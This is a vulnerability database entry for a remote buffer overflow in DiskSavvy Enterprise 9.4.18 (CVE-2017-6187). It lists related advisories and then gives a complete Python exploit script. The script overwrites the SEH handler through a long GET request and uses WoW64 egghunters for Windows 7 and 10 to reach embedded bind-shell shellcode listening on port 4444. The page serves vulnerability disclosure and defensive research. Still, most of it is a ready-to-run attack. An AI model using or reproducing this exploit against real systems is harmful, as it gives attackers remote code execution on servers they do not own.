
Disk Savvy Enterprise 9.4.18 Buffer Overflow

🗓️ 22 Feb 2017 00:00:00 · Reported by Peter Baris · Type:
packetstorm

DiskSavvy Enterprise 9.4.18 Buffer Overflow

Related
Reporter · Title · Published · Views
Family
0day.today
Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH) Exploit
22 Feb 2017 00:00
zdt
Circl
CVE-2017-6187
29 May 2018 15:50
circl
CNVD
DiskSavvy Enterprise Buffer Overflow Vulnerability
23 Feb 2017 00:00
cnvd
CVE
CVE-2017-6187
22 Feb 2017 23:00
cve
Cvelist
CVE-2017-6187
22 Feb 2017 23:00
cvelist
Metasploit
DiskSavvy Enterprise GET Buffer Overflow
19 Jan 2017 19:34
metasploit
NVD
CVE-2017-6187
22 Feb 2017 23:59
nvd
OpenVAS
Disk Savvy Enterprise Server <= 9.4.18 Buffer Overflow Vulnerability
2 Dec 2016 00:00
openvas
Prion
Buffer overflow
22 Feb 2017 23:59
prion
Saint
Disk Savvy Enterprise long URI in GET request buffer overflow
16 Mar 2017 00:00
saint
`# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters   
# Date: 2017-02-22  
# Exploit Author: Peter Baris  
# Vendor Homepage: www.saptech-erp.com.au  
# Software Link: http://www.disksavvy.com/downloads.html  
# Version: 9.4.18  
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64  
  
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems  
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit  
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version  
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php  
  
import socket  
import sys  
  
try:  
host = sys.argv[1]  
os = sys.argv[2]  
port = 80  
except IndexError:  
print "[+] Usage %s <host> win7/win10" % sys.argv[0]  
print "[i] Example: dsavvy.py localhost win10"  
sys.exit()  
  
  
# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20  
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"  
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"  
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"  
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"  
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"  
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"  
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"  
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"  
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"  
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"  
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"  
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"  
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"  
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"  
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"  
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"  
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"  
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"  
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"  
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"  
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"  
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"  
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"  
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")  
  
crash = "\x41" * 2487  
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret  
filler = "\x44" * (2505-334-300-100)  
nseh = "\xeb\x08\x90\x90"  
stack_fill="\x41"*100  
nops="\x90"*8  
egg = "t00wt00w"  
  
if os == "win7":  
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"  
"\x33\xd2"  
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"  
"\x2e\x5a\x3c\x05\x74\xef\xb8"  
"\x74\x30\x30\x77"  
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"  
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")  
  
elif os == "win10":  
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"  
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"  
"\x74\x30\x30\x77"  
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"  
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")  
  
else:  
print "[!] This windows version is not supported yet"  
exit(0)  
  
exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler  
  
buffer = "GET /"+exploit+" HTTP/1.1\r\n"  
buffer+= "Host: "+host+"\r\n"  
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"  
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"  
buffer+="Accept-Language: en-US,en;q=0.5\r\n"  
buffer+="Accept-Encoding: gzip, deflate\r\n"  
buffer+="Referer: http://"+host+"/login\r\n"  
buffer+="Connection: keep-alive\r\n"  
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"  
buffer+="Content-Length: 5900\r\n\r\n"  
  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect=s.connect((host,port))  
s.send(buffer)  
s.close()  
  
`
